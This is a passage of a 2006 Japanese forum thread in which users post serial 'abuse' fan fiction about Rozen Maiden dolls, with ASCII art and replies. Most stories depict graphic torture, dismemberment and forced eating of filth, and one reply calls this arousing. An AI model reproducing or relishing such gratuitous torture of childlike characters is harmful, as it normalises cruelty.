「そぉ〜ね翠星石ちゃんにあんなことされちゃあ...」
「のり」
「あわわわ、な、なんでもないのよ〜翠星石ちゃん」
「ちょ、す、翠星石がなにしたっていうですか!翠星石は何も覚えちゃねぇですよ!
 い、いったい何があったっていうですかぁ??」
「えーと...」
「やめなさい、のり」
「も、もういいです!朝ごはんなんていらないのですぅ!!みんなで翠星石を無視すればいいのですぅ〜!!!」


574 :名無しかわいいよ名無し:2006/03/04(土) 21:22:29 ID:bMGD8BLG
虐待ってのはトニーとかデュードとか初期みたいなのを言うんだよ。
最近は変なのが混じってるせいか虐待とも呼べないのが多すぎる。

575 :名無しかわいいよ名無し:2006/03/04(土) 21:27:01 ID:vvOgxxNd
虐待と言うよりイジリというほうが正しいな
それはそれでいいとは思うが

576 :名無しかわいいよ名無し:2006/03/04(土) 21:33:36 ID:k5Xe1rkz
なるほど。あんまり人目につかないほうがいいわけか。
じゃあ次からはsage進行でいくぜ。

577 :名無しかわいいよ名無し:2006/03/04(土) 21:38:47 ID:01ySZ6AT

                   _ _     .'  , .. ∧_∧
          ∧  _ - ― = ̄  ̄`:, .∴ '     (    )>>571
         , -'' ̄    __――=', ・,‘ r⌒>  _/ /
        /   -―  ̄ ̄   ̄"'" .   ’ | y'⌒  ⌒i
       /   ノ                 |  /  ノ |
      /  , イ )                 , ー'  /´ヾ_ノ
      /   _, \               / ,  ノ
      |  / \  `、            / / /
      j  /  ヽ  |           / / ,'
    / ノ   {  |          /  /|  |
   / /     | (_         !、_/ /   〉
  `、_〉      ー‐‐`            |_/

578 :573の続き:2006/03/04(土) 21:53:12 ID:XdMDOlNW
「うう...どうしてみんな翠星石を無視するですか?翠星石が何したっていうですか?」

♪は〜なまるさ〜んはなまるさ〜ん、どおしてあなたはおいしいのぉ〜♪

「こ、このこっぱずかしい歌はおバカ苺ですぅ、こーなったらチビチビに聞き出してやるですぅ!
 こら、おバカ苺!待つです!」
「ふゆ?あ〜翠星石ぃ。いたたた!髪をひっぱらないでなの!」
「おバカ苺、髪の毛ひっこ抜かれたくなかったら昨日あったこと洗いざらいぶちまけれやがれです!」
「うぅ〜ダメなの〜真紅に翠星石が白酒のんで酔っ払ってジュンに『せくはら』したことを翠星石にいっちゃダメって言われたの〜」
「す、翠星石が、ち、チビ人間にセクハラってどういうことです??言え!言うです!全部話すです!」
「ダメなの!真紅に翠星石がスィドリームで庭師の如雨露使ってジュンを植物で縛り上げてムリヤリ『ちゅー』したなんて、
 ぜ〜ったい翠星石に言っちゃダメって言われたの〜〜〜」
「ちょ、い今なんて言ったです?す、翠星石がチビ人間に『ちゅー』ですってぇ??」
「嘘じゃないの〜翠星石に言わないようにみんなで決めたの〜」
「え、あ、ちょ、す、すすす翠星石がちちちちチビ人間に『ちゅー』だなんて、う、嘘です!そそそそんなこと
 すす翠星石は」
「あ〜ジュン〜雛といっしょに遊ぶの〜」
「ち、チビ?」
「!ッ(///)」
ダダダッ...バタン!
「ち、チビ人間!ちょ、ま、え?あ、す、翠星石はほほホントにチビ人げ...ジュ、ジュンと...
 そ、そそそそんな!す翠星石はな〜んにも覚えてないのです!ってななな何を言ってるですか!
すすす翠星石はあんなチビのことどーだっていいのです!べべべ別にあんなのと『ちゅー』したって別に
翠星石はすす翠星石はせ、せっかくの『ちゅー』なのになんで覚えてないですか!?
べべべ別にち、チビのことなんてすすす翠星石はななななんとも思ってないのです!思ってない思ってないのです!
だだだ、だから別にみんなの前で...み、みんなの前?!みんなが翠星石を無視するのはm、みんなの前でジュジュジュジュンと、
ちゅちゅちゅちゅちゅー???あわわわ、ちちち違うのですああああれは翠星石は何も知らないのです!
知らな知らな知ら...ななななんで覚えてないですかせっかくの『ちゅー』をこんなチャンスは二度と...
ななな何をいってるですかい、い、い、いやああああああああああああああっ!!!!!」

「あ〜あ翠星石ちゃんパニックになってるぅ」
「黙っていれば、何も知らずにすんだのだわ」
「うゆ〜ごめんなさいなの〜」

END

 

579 :名無しかわいいよ名無し:2006/03/04(土) 22:13:48 ID:56GQrvbl
>>578
虐待じゃないけどGJ!!

最近の流れが気に食わなくて文句言ってる奴もいるが、俺は最近のソフトな虐待、気に入ってる。
がんばってくれ!

580 :名無しかわいいよ名無し:2006/03/04(土) 22:41:58 ID:87DxgYtQ
(改訂版)
自分の事をかわいいと思っているクソ雛苺に作中における己のあり方の真相を思い知らせる為に、
顔面矯正処置を施してやる。
まず服の上から尻に成人男性と同量のホリゾンを注射して昏睡状態にさせる。
革製のベルトで小児用の寝台に固定、特に頭部を微動だにせぬよう慎重に調節。
顔面の素材に応じた特殊技能者を招聘し、工作機械もしくは薬剤等を用いて作業を展開。
日本の伝統工芸品である「ひょっとこ」の面貌に顔面を改造。

その後、全面が鏡で覆われた部屋にすやすや眠るクソ雛苺を移動させ、覚醒を待つ。
廊下の長椅子には作業の成功を信じて待機するジュンと巴。
覚醒したクソ雛苺は己の変わり果てた姿を目の当たりにして狂ったように号泣しながら逃げ惑う。
しかし、どこへ向かっても目の前には鏡の壁面があるのみ。自分自身から逃れる事は出来ない。
「雛、かわいいのおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおっ!」
聞き覚えのある叫び声を耳にした二人が部屋に飛び込んで目にしたものは、フランス人形の衣装を
身に纏った小さな一体の「ひょっとこ」。
「トゥモエ〜雛なの。私雛なの、わかるでしょ? 雛なのよ」
「ひょっとこ」に泣き叫びながら胸に飛び込まれ、ショックの余り失禁して気絶する巴。
「ぅうそだあっ!こんなのが雛苺なわけがないっ!」憤然とそう叫んで部屋を後にするジュン。
巴が別室に運び出され一匹になった「ひょっとこ」面のクソ雛苺。
上下左右全面が鏡。目を開ければ飛び込んでくる「ひょっとこ」面の自分。逃れようのない真実。
「私はかわいい」という誤った自己認識だけで生きてきたクソ雛苺が醜い内面に相応しい風貌を
「取り戻した」 今回の施術。
しかし、極めて強情な自我ゆえ内外面の一体化に失敗したクソ雛苺は精神崩壊を来たしてしまう。
クソ雛苺は「ひょっとこ面の己」の受容を頑なに拒み、発狂という痛ましい事態を自ら招いたのだ。

両親に説得され、泣く泣く見世物小屋への譲渡書にサインする巴。
以後クソ雛苺は浅草でフランス人も含む外国人観光客を相手に、絶望と激しい失意のどん底の中で
「ひょっとこ踊り」をして生きてゆくのだ。仮にクソ雛苺自身が激しく精神的に拒み続けようとも。
それがクソ雛苺にとって最も相応しい在り方なのだから。
クソ雛苺は、顔面矯正とそれに伴う葛藤を経てその内面に相応しい自己へと還元されたのだ。
すなわち、「笑いもののちんちくりん人形」である。


581 :名無しかわいいよ名無し:2006/03/04(土) 22:55:37 ID:bMGD8BLG
あんまりメジャーにしてほしくなかったんだよねこのスレ。
以前に比べるとホント変なのがいるから

582 :名無しかわいいよ名無し:2006/03/04(土) 23:12:19 ID:k5Xe1rkz
「わ、わかったです!出てくるです!」
二階から声が聞こえた。
「手こずらせやがてクソッタレ」
二階からトコトコと降りてくる翠星石。
そこにデュードは蹴りを食らわせた。
「っきゃ!」
「さっさと降りろ!なにトロトロしてんだ!」
「出てきてやったです!さっさと二人を直すです!」
その言い草に腹を立てたデュードはさらに蹴りを入れる。
「命令口調で言うんじゃねえよゴミ!オラ!もう一回言い直せ!」
「ふ、二人を直して下さいですぅ!」
激しい蹴りに耐えながら、涙ながらに言われるままにした。
「よーし、ちゃっちゃと終わらすぜ。」
そういって彼は赤い液体の入った注射器を取り出した。その注射を自らの手に打ち込む。
「ああ〜キクぜ〜・・・っそら二匹とも生き返ったぜ!」
だが真紅と雛苺の胴体は横たわったままだ。首はない。
「どうしてですか!うう、真紅・・・雛苺・・・うえええええん!」
二人に歩み寄って泣きじゃくるデュード
「ああ?なひいってるかわかんねえよ」
デュードは斧を取り出し翠星石の腹を切り裂いた。
「っきゃああああ!お腹が・・・痛い!」
「いひひひひゃひゃひゃ!痛いか?切り口をさらに痛めつけてやる」
そう言って胴体を蹴りまくるデュード。
「う!もう、やめるです!絶対服従しますですぅ!」
「知るかよチンカス野郎が!ひっひっひ死んじまえ!」
そして翠星石の首を斧で切断し、斧で叩き潰してしまった。
「ひゃひゃひゃひゃ!!!いい気分だぜ!二階から小便でもするか!」
ヤクでハイになっている彼の行動は常軌を脱していた。
ふらふらになりながら階段を上るデュード。と、彼は段差の一つで足を滑らせてしまった。
途端に階段を転げ落ちる。
「うお!っが!っぐえ!」
頭から落っこちてぐったりとしているデュード。
「・・・後悔はしてねえぜ・・・」

To Be Continued

583 :名無しかわいいよ名無し:2006/03/04(土) 23:28:55 ID:t8soxX9P
うん、ソフトもハードもよりどりみどりだな。
好きなランク
コメディ>ノーマル>悲しい系>ソフト虐待>ハード虐待

584 :名無しかわいいよ名無し:2006/03/04(土) 23:38:38 ID:0aJAwH2J
      ___
     / __⌒ヾ
     / // \JJ
    / //
    | ))
    ヽ  \/ヽ
    |⌒\  ヽ|
    | ノ\_、 く_
    (_>  (   ) >>577
      ∴\|\|
       __;∴
     ∧ _= ̄`;
     γ ̄ _≡:;
    / ―ニ ̄"'.
   /  ノ
   /  イ)
  /  _ \
  | /\ `、
  j /  ヽ |
 / ノ  { |
/ /   | (_
`、_〉   ー--`


585 :名無しかわいいよ名無し:2006/03/05(日) 00:09:40 ID:DCuf1LGi
>>583
好みに合わせるスレでもないがな

586 :名無しかわいいよ名無し:2006/03/05(日) 00:12:43 ID:A5pcFSWg
                                             >>584
                _                           Λ_Λ
               ̄   ̄                         (´Д` ;)
        . '            ヽ
       /                                    //
      /                                  //
           ,-( ヽ         i               /
    /       メ、ヽ ヽ          |               /
          /  ヽl  |        |            /
        /    // /        !          ,
       /Λ_Λ// /
     / ( ´∀/ /
    /   γ    /         /
  θ     ヘ    |        /
         )   |       ,
         /     |
         /  ヘ   |   /
        i  / |  |  /  /   , '    _/  |l
       /  /   |  |    し'   /      / ̄/
      /  /.  /  |       (   _   /  /   〃,
     (  /   /  l  と と )  て ̄          /
     し'   /__) (_(_,J

587 :名無しかわいいよ名無し:2006/03/05(日) 00:14:42 ID:rDXf2ZZm
>>583
とりあえず、強いアンチが集まりやすいスレなんでsage進行でお願いします

588 :名無しかわいいよ名無し:2006/03/05(日) 00:19:48 ID:IbZG9qJl
    ∧_∧
   (´Д`)
   / mn   \
  〈 (_n ̄)ィ 〉
  ヽ_(yヽi/ ノ
    ト、_//
    /| i  ヽ
   〈 | |\ ヽ
   ヽ/ ノ ヽ i
    / ∧  | |
`/ヽ_/ 〈 ) i i
し/ ∧_∧/⌒i( ヽ
 ゝ(;´Д)ノi ノ \_)
 / ノ r-っ (ノミ>
〈  ̄ ̄メ ))
  ̄ ̄ヽ`つて バンバン>>586
   )/VVヽ(



589 :名無しかわいいよ名無し:2006/03/05(日) 00:20:45 ID:TX/ENFi+
デュード編、ウィークエンドが読みたいなら書くぜ?

590 :名無しかわいいよ名無し:2006/03/05(日) 00:33:43 ID:rDXf2ZZm
>>589
wktk

591 :名無しかわいいよ名無し:2006/03/05(日) 00:46:57 ID:A5pcFSWg



              _                         ,,从.ノ巛ミ    彡ミ彡)ミ彡ミ彡ミ彡)ミ彡)''"
             ,'´r==ミ、                   人ノ゙ ⌒ヽ         彡ミ彡)ミ彡)ミ彡)'
       ,_ _ _   卯,iリノ)))〉 _ _ _ゴオオオオオ     ,,..、;;:〜''"゙゙       )  从    ミ彡ミ彡)ミ彡,,)i
     /   `."-|l〉l.゚ ー゚ノl/    ,,..、;;:〜-:''"゙⌒゙          彡 ,,     ⌒ヽ     ミ彡"
    '"'⌒`~"'" ''|!/'i)卯iつ i==m==:::゙:゙                    '"゙∀`) >>588    ミ彡)彡''"
            ''y /x lヽ      ``゙⌒`゙"''〜-、:;;,_              )   彡,,ノ彡〜''"
           l†/しソ†|                ゙⌒`゙"''〜-、,,     ,,彡⌒''〜''"人 ヽノ
           lノ   レ 

592 :名無しかわいいよ名無し:2006/03/05(日) 07:55:13 ID:IbZG9qJl
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
|∧_∧ ∧_∧ ハァハァ
|´Д`)(;´Д`) ハァハァ  >>591
|_∧ /⌒  ∧_∧  オ、オレタチニモタノム…
|Д`)∧_∧(;´Д`)
|_∧(;´Д`) ∧_∧
|Д`) ∧_∧(;´Д`)
| ヽ(;´Д`) ハァハァヽ
| | /⌒  ヽ  ||
| |||  ||\/||
| / \\/||\\||
|/  \\||\し(ノ
| /⌒\し(ノ > )
|/   > ) / /
|   / / (_つ
|   (_つ   |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


593 :名無しかわいいよ名無し:2006/03/05(日) 08:33:12 ID:/BeVvwqo
         \  /:.:/:.:.:/:.:.:.:.:.:.:.:.:.:.:.:.l:.:\ ヽ \
          ヽ/:.:.:/:.:.:/:.:.:.:.:.:.:.:.:.:.:/:./:/:.:.:.:.!ヽ ヽlヽ
            /:.:.:.:|:.:./:.:.:.:.:.:.:.:.:.:.:///:.:l:.:.:.:|:.:ヽ / l
.           |:.:.:.:..|ィ‐_-_、_. -///;ハ:.:|:.:.:.:!:.:.:.V   l
.           |l:.:.:.:.N r‐ァ-、` ̄  メ/‐-ヽ|、:.:|:.:.:.:|   _」
            ハ:.:.:.:l  弋:ソ  /´ ィ=‐、、\/:.:.:./-r ´
          /:.li \_\      ,   弋:ソ '´/:.:.:./:.:.:.l
.      __ /:.:.li   il、   , -- ‐、   _/:.:./:.:.:.:.:.!
     /´‐-、ト,:./:li ※ il:.:\ {__   }  ア ̄/l:.:.:.:.:.:l:.l   ケンカはやめやがれですーッ!!!
.   /  ‐-〈//li  il:.:.:.:.:.> 二ニ´ィ:li ※〃:.l:.:.:.:.:.:.l:l
   l  `ニ7'´: :.li   il ̄ ̄ _\ノヽ._l:li   il-lユ‐_-、:.:!l
  r‐l   |フ!: : にli  il〃 ̄  ィトK\  li  ilこ|ー‐  |:.:.:.l
  |〉l  イ _): :.にli※/ \///)l:l l:l ヽli. ilこ!|二  /:.:.:.:.:!
/>にLイ<:.:にli /´     //(!|:| L!==li※!こl./  /!:.:.:.:.:.:.l
丁L__|ーLノ:.:.:.にX      // )!|:|   ハ ilこ! l  /ヽl:.:.:.:.:.:.:l



594 :名無しかわいいよ名無し:2006/03/05(日) 10:10:35 ID:4CWmlKig
>>593
ageておきながらなに言ってんだ!虐待するぞ!

595 :名無しかわいいよ名無し:2006/03/05(日) 11:53:54 ID:obollflz
>>566
>翠星石は俺の嫁

それは翠星石にとって最悪の虐待だなぁw


596 :名無しかわいいよ名無し:2006/03/05(日) 15:10:33 ID:mAhI/U4J
>>484 の続き

『こ、この鬼畜ちび人間!いい加減にするですぅ!
どこまで性根が腐りきっているですか!さっさと蓋を開けて髪を放すですぅ!
この髪は、この髪はお父さまのお手製の、翠星石の命ですぅ!
これ以上穢すのは許さないですぅ!』
マンホールの蓋でおさげ髪を固定された翠星石は、下半身をじたばたさせながらも
依然として憎まれ口での抵抗をやめない。とはいえ、片足を砕かれ、鞄を破壊され、
既に薔薇乙女としての自尊心は満身創痍、この台詞も自我を水際で維持する
最後の抵抗なのだろう。しかしジュンには、この期に及んでもまだ止まない
一段上から見下すような翠星石の言い回しが一層、癇に障るのだ。
「いい加減煩いのはおまえのほうなんだよ!前っから気に入らなかったんだ!
お前のその『ですぅ』と、何かにつけて鼻につく、その命令口調!
何様のつもりなんだよ!ヒトを見下すその言い方、こんどこそ封じ込めてやる!」
逆上したジュンは何度も翠星石の口元を踵で踏み付けた。それだけでは飽き足らず、
玄関から槌を持ってくると、力任せに鼻から口元を何度も打ち据えた。
『ひぐゥう!ひぐゥウ!はぐぅ!ぐふぅウ!やめ..ぐふっ!ひぐぅうう!』
「はぁはぁはぁはぁ...」翠星石の顎に罅が入りはじめたところで
ジュンは一旦腰を下ろすと、ポケットからチューブ入りの接着剤を出し、
キャップを開けて、それを翠星石の壊れかけた口元に近づけた。
『こ、この期に及んで何をするですか!こ、こんな酷い...ドールの命より大事な
顔を辱めるなんて鬼畜以下の所業ですぅ..えぐっ!えぐっ!蒼星石..お父様..
へぐっ!へぐっ!そんなものたべたくないですぅ!やめろですぅ!』
相変わらずの『ですぅ』口調に、いい加減堪忍袋の緒が切れたジュンは、
翠星石の口をペンチでこじあけると無理矢理、チューブを口の中に捩じ込み
接着剤をゆっくりと口の中へ注入していった。
『ひぃぃぃぐぐううぅぅぅぅぅぅぅぅぅ!うぐぐぐふぅひぐぐぐぅぅ』
ジュンは一層力を込めて、チューブの内容物を一気に全て流し込んだ。
胃、食道、そんな概念は人形にはないのだろうが、尋常ならざる異物を大量に
食べさせられた不快感は本物だ。翠星石は既に言葉にならないうめき声をあげ、
もがき苦しみのたうちまわった。
『ぐおぅんなぁ、びどいごぉとを、よぉぐもぉ、ぶおぅまえぇ、ぶゅるさないでずぅ!でずぅ!でずぅブヘッ!』


597 :名無しかわいいよ名無し:2006/03/05(日) 18:05:39 ID:rDXf2ZZm
>>596
GJ 何だかおにんにんがおっきした俺は変態ですね。


598 :名無しかわいいよ名無し:2006/03/06(月) 00:32:58 ID:sTBnVCCE

.    ┌- 、,. -┐
     く|_,.ヘ_|〉
    ノ イ从|从)、
     |ミ|ミ!゚ ヮ゚ノミ!|
     `'' ([{.∞}]) '
        /__ハ_|
      `もテ
↓のスレで雛たちといっしょにおはなししようなの〜
http://anime.2ch.net/test/read.cgi/anichara2/1121865591/l50

599 :名無しかわいいよ名無し:2006/03/06(月) 00:50:18 ID:Fm2/N7YP
>>596のつづき

はははは!これでお得意の『ですぅ』節もロクに喋れなくなったなあ!
粘ったクチで、そのへらず口、叩けるモンなら叩いてみろよ!」
そのまま槌で打ち据えて、顎を完全に壊すことも出来れば、
猿轡で口を封じることもたやすいが、ジュンは敢えて翠星石の口を壊さず、
喋りたくても思い通りに喋れないもどかしさで責める方法を選んだ。
『びどい、びどいでずぅ!ぐぉんな、ぐぉんなごどお、なんべ、
ぶジュブ、ぶジュブ、ぼぅじで、ごぉんなごぼ、ずるでずぅ!
だずげで、だずげでぼじいべずよぅ ぞうぜいぜぎぃ・・・』
翠星石はオッドアイをナミダで一杯に満たして、マスターであったはずの
この少年の狂気の虐待を、何故、何故、なんで、の一心で疑いつつも、
現実に自分が晒されているこの仕打ちを呪い、憎み、慟哭した。
しかし、粘った口腔のために、もう翠星石は泣き叫ぶことも出来なくなっていた。
「ヘッ!こんなミドリのドレスを被ったゴミが、よく薔薇乙女なんて
ほざいていたもんだよな!何が『さっさと契約しやがれですぅ』だよ!
ニンゲンに作られた分際で、ニンゲン見下すような台詞ばかり吐きやがって!
本当は弱々しく、臆病で、人見知りのクセに、そんなテメェの内面隠すために
そんな憎まれ口かよ?おまえのその物言いが、
僕や雛苺をどれだけ傷つけたと思ってるんだ!
サ・イ・テ・ー!のローゼンメイデンだよ、お前はさ!」
ジュンは再び踵で翠星石の胸を何度も踏みつけ、蹴り飛ばし、
「こんなゴミ人形に、不似合いなんだよ!」と、チャームポイントだった
ヘッドドレスを剥ぎ取って投げ捨てた。もう、髪も衣裳もズタ襤褸になり、
ジュンの容赦ない物言いにより精神面もズタズタにされつつあった。
「ジュン!何をしているの?」その声を聞いて、翠星石はやっとこの地獄から
救われる思いがした。真紅だ。異変に気付いたのか、玄関から出て来て
ジュンのもとへ向かってきた。
「何だよ、悪いけど、僕はこの糞人形に恨みがある。雛苺だってそうだ。
おまえだって、このクソミドリが雛のおやつを何度となく横取りしたの、
見ていただろ?真紅の鞄にわざと落書きして、雛のせいにしたり、
こいつはしょっちゅうだ!それでしまいには、
『おまえの陰気な性格とおばか苺のおダメぶりを直したいからですぅ』
などとほざきやがる!夢の庭師だぁ?ふざけるな!このクソミドリのゴミ人形!」
狂気の形相で翠星石を蹴り飛ばすジュンと、ぐふぅ、ふぐぐふぅ、と呻く翠星石。
それを淡々とした目つきで凝視する真紅。
しかし、意外にも真紅が翠星石へと助けの手を差し伸べる気配は全くない。
それは翠星石にとって、更なる残酷な境遇への入り口を仄めかすものだった。

600 :名無しかわいいよ名無し:2006/03/06(月) 00:55:17 ID:Fm2/N7YP

         /   /ヘ/  / /   /    /   //  /  / ヽ  \       \ \
        ./ _/ /  / /   /    /  / /  /   ∧_ヽ   \     ヽ.  ヽ
       // /! /  .l  l  /,.-‐'フフヽ.//  /   /´ヽヽ `>.、 .!       ',`ヽ 〉
        /   / |/    |  l// // /.: / ノ   /. :.:.ヽ \\ `ト、    |  | /
        {   ./ ||     l/  /ン-‐<、 ://:/  ./: :,ィ─ヽ-\ヽ. | |   |  |′
         \、.--|l-‐''"_,. -‐''",. =,=¬ミ、/: : :/  /: : : ノ゙,ニ==ミ、 | |   |  |
        /  ̄|| ̄   {: :く   ト-'  }  : : / ./: : : : : ト-'   } // /   j l !
        /   .!',      \:.` ゝ -‐'  .//      ー--  ./ /   /j | /
         /     ', ヽ   \ゝ、        ノ : : !           ノ/  .//ノ'
       ./    .∧ \   \                  -┐ ∠ -‐''" /
       /     /,ハ = ゝヘ、_  ゝ、               __ノ)      /〃/
     /     //  ヽ〃 ヾ ヽ ̄ ̄   、_,.. -−'' ´ ̄   /     /</
   /    ,r'"´ ̄了ゝ、rー、 ヽ      ` ー──‐ '' ´     /liヾ/
  /    / ゝ, -‐'7`ーイ__.」、  \         ー          /   |
/   , f´ ̄/   /  ノ/ヽゝン‐.、V丶、              /|     |
   / 之/   /  /   ヽ ヽノ1ヽ-、.`丶、    _,. -‐'"´  /|ヾ 「l〃|
  / 「 /     / /      ', | ヽ \    ̄   /   / |= =l
/  .ゝ/     //       .i l , -イ   ヽ. ヽ     ,イヽ /  |〃il ヾl
   ,r/    /        || L.、|   l  `丶、 f |  `ヽ、 |     !
  /./     /           || ヽjヾ||〃l  ,. ‐-、ヽl   _  \|      ヽ
/ /     /         || ノj= =|/ , --ヘ}⌒}´_\  \ 、 ヾ r ヽ

今宵はここまで。仕事終わったらまた続ける。by 484=596=599


601 :名無しかわいいよ名無し:2006/03/06(月) 00:56:08 ID:ilIpEf5C
>>600
とても非常にグッジョブです

602 :名無しかわいいよ名無し:2006/03/06(月) 03:09:51 ID:Td8V6hED
>>600
GJ。期待して待ってます。

603 :名無しかわいいよ名無し:2006/03/06(月) 03:22:43 ID:RFRht8nf
>>521のつづき
ブシャ チャリン パキ チャリン ペキ チャリン
翠星石をふとももを噛み砕く音と揺れる鎖の音が響く。
「ヒギャァァァァ! 痛いです、も、もうやめやがれですぅ!」
「からしつけすぎで辛いけど柔らかくておいしいなぁ・・・、でも少し食べずらいかな?」
そう言うと人間はどこかへ歩いていった。

「これはチャンスです! 今のうちに」
人間はいない。翠星石の額にあるフックはさっき激しく動いたせいか外れかかっている。
「こうやれば・・・痛いです!」
反動をつけてどうにか額のフックをはずそうとするがなかなか外れない。額の痛みが増していく。
「く、これでもかです!」
パキン
「フギャ!」
額の一部とともにフックが外れた。宙に浮く翠星石。
バスン
「ンガ!」
顔から地面に落ちる。ほこりが舞った。
「ゴホッ、ゲッホッホホ、やったです! これでデブ人間ともおさらばです!」
ほこりのせいで咳き込んではいたが、翠星石の顔に笑顔が戻った。しかし、右ふとももが残っているとは言え、右足はほぼないも同然だ。
カラン カラン カラン
仕方がなく鋏となっている両手で這う。
「見つけたですぅ! あそこから外に」
翠星石は扉へとむかってはいずった。しかし・・・、
ドタ ドタ ドタ ドタ ドタ
翠星石の後ろから何かが駆けてくる音がした。
「な、何ですかぁ?」
翠星石に何者かの影が重なる。急に暗くなったことを怪しんだ翠星石は後ろを振り向いた。
「あ! あれは!」
翠星石の視界には人間の飛び上がった姿がはいっていた。

604 :名無しかわいいよ名無し:2006/03/06(月) 03:53:14 ID:RFRht8nf
>>603のつづき
ドスン
当然軽く百キロを超える巨体は翠星石の体へと落ちた。
ミシ パキ ペキャ コロン
翠星石の体がさまざまな音を奏でる。
「フギャッ! 痛いですぅ、重いですぅ・・・」
ようやく自由になれると思っていた翠星石は涙声になっていた。
「残念でしたw あっ、そうそういいもの持ってきたんだよ」
人間は手にしていたものを翠星石の顔の前にもってきた。
「まさか、これで・・・」
「うん、踊り食いもいいけど食べずらいから、これでこまかくしようと思ってね」
「いやぁぁぁぁですぅぅぅぅ! やめてですぅぅぅぅぅぅぅぅ!」
「ホントに活きがいいね! 翠星石ちゃんは♪」
人間は嬉々とした感じで手に持ったものを翠星石の右足付け根に当てる。ふとももを取るためだ。
チクリ
「ヒッ!」
物体が当てられた感触に翠星石はそれだけで声をあげた。
「ヒヒヒ、糸ノコなんて久しぶりだからうまく切り取れるかな」
「お願いですぅ、やめて欲しいですぅ」
「ふぅーん」
ギリ
「ヒギャ!」
人間は翠星石のそんな言葉を意に介さずに手を動かした。
ギリ ギリ ギリ ギリ ギリ ギリ ギリ ギリ ギリ ギリ ギリ ギリ
「ヒギャ、痛いです! やめやがれですぅ! このデブ人間! 言うこと聞きやがれです!」
「そんなこと言っていいの?」
ギリ ギリ ギリ ギリ ギリ ギリ ポキーーーーーーーーーーーーン
「ヒギャァァァァァァァァァァァァァァァァァァァァァァァァァァァァァァ!!!!!」
「お、うまくとれたな」
そういうと人間は右ふとももを手に取った。

605 :名無しかわいいよ名無し:2006/03/06(月) 03:55:05 ID:Y0jZ3mFp
デュードは目を覚ますとベッドの上にいた。
「ってえ・・・脳ミソがイカレちまったみたいだぜ」
頭を抱えながら、ふと辺りを見回すと、その醜態に驚いた。
「どうなってんだよこりゃ」
家の中は凄い荒れようだった。
「ああ!俺のパソコン!」
こんなことをするのはやつに違いない。そう決め付けた彼はさっそくベッドから起き上がる。
そして引き出しからナタを取り出した。
「今殺してやるぜ翠星石!」
トレーラーハウスのドアを蹴り飛ばすと、目の前にある翠星石の小屋に向かって怒鳴った。
「おい翠星石!さっさと出てきやがれ!あれ?こりゃ前にもあった展開だな」
そう思いつつ、辺りを見回すと、翠星石らしき姿が目に止まった。
「お!見つけたぜ!ここでキャットニップだ!」
*キャットニップとは:猫用のエサだが人間が使用することで時間の流れがスローに見える。幻覚作用?
「へっへっへ!トロすぎるぜ翠星石!」
あっという間に翠星石のところまで行き、腕を掴んだ!
「っきゃ!デュード!なぜこんな早く!」
「俺は神だからだよ!それよりも部屋めちゃくちゃにしやがって!タダじゃおかねえぞ!」
その言葉に身震いする翠星石。
「おら!さっさとついて来い!」
デュードに抵抗できぬまま強引に引っ張られる。
「嫌です!あそこには戻りたくないです!」
喚く翠星石を見てデュードは顔色を変えた。
「っぐえ!」
翠星石の顔面にパンチが飛ぶ。
「黙ってろ!とにかく部屋片付けたら自由にしてやるよ」
「そんなの嘘です!絶対騙すに決まってるです!」
今まで何度も騙されてきた彼女だ。今回も、というわけにはいかない。
「本当だって。俺も疲れたからなあ。ここで言うこと聞いて愛しいジュンのところへ帰るか、俺の愛を永遠に受けるかどっちがいい?」
「わかりましたです!片付けてこんなところおさらばするです!」
デュードの言う愛などただ甚振るだけだ。とにかくここから逃げられる希望を信じよう。翠星石はそう考えた。

606 :名無しかわいいよ名無し:2006/03/06(月) 03:56:04 ID:RFRht8nf
>>600
GJ!

607 :名無しかわいいよ名無し:2006/03/06(月) 04:13:57 ID:Y0jZ3mFp
「ほら、まずは冷蔵庫を起こせ!自分でやったんだから自分で始末くらいしろよな!」
デュードはベッドの上でくつろぎながら指示した。
「う・・・こんな大きいの無理です・・・・」
翠星石の目の前にあるのは2メートルほどの冷蔵庫。人間でも簡単に持ち運びができないものだ。人形に動かせるはずがない。
それを見てデュードは皮肉るように言った。
「おいおい翠星石。倒したのはお前だぜ?なら逆転の発想で起こすのも簡単なはずだ」
「無理です!こんなものどうやって動かせってんですか!」
「・・・やれねえのか?」
サングラスの奥に光る冷たい目が翠星石を睨みつける。
「やるです・・・」
翠星石はしぶしぶ同意した。そして冷蔵庫に手を掛けあらん限りの力を振り絞った。
だが冷蔵庫はびくともしない。
「はあはあ、ダメです・・・」
そこへデュードの蹴りが飛ぶ。
「っきゃ!」
「できねえなら倒すんじゃねえよ!このクズが!」
そう言いながらデュードは冷蔵庫を起こした。
そして蹴られて倒れている翠星石の方へ倒した。
起き上がろうとする翠星石の背後には巨大な冷蔵庫の姿があった。ッドスンという音を立てて翠星石を潰す。
「っひぎゃ!」
「おうおう、まだ生きてるな。さすが人形だぜっへっへっへ」
痙攣する翠星石を見て不気味な笑い声を上げるデュード。
「あ、足の感覚が・・・」
翠星石の足は冷蔵庫の重さで潰れてしまっていた。
そんなことはお構いなしにデュードは次の指示を与える。
「おい、次は台所だ!さっさと動け!」
「足が・・・足が痛くて動けないですぅ!」
「なにぃ?痛いなら取り除けば良いことだろうが!」
デュードはハンマーで翠星石の両足を叩き潰した。
「いやあああ!足が!うううぅぅぅ・・・」
とうとう翠星石は泣き出してしまった。
「結局俺が片付けるんじゃねえか。まあいい。生ゴミ捨てるの面倒だからお前処理しろ」
そういって生ゴミの詰まったゴミ袋を翠星石の前に突き出した。
「これを・・・どうするんですか・・・」
「食うんだよ馬鹿!そんなくせえもんここにおいて置けるか!」
中身はデュード自身のゲロだらけである。
アルコールや薬物の取りすぎでたびたび体を壊していたデュードはよく生ゴミ用のゴミ袋で用をたしていた。
「うええ・・・臭い・・・」
あまりの汚さと臭さに目を逸らしてしまう翠星石。
だがデュードはそれすら許さない。
「っぎゃ!」
翠星石の顔を袋に足で押さえつけた。
「う!気持ち悪い!やめて!うげえええええ!」
自らもゲロを吐いてしまう翠星石だった。
デュードは髪の毛を掴んで顔を上げさせた。
涙と口から垂れるゲロがなんとも汚らしい翠星石。
「なんだよこりゃあ・・・薔薇乙女の風格なんてあったもんじゃねえぜ。ヒッヒッヒッヒッヒ!」

608 :名無しかわいいよ名無し:2006/03/06(月) 04:26:52 ID:Y0jZ3mFp
「次は机だ!壊れたパソコンも直せよ!」
「もう嫌です・・・さっさとジュンの所へ返せです・・・」
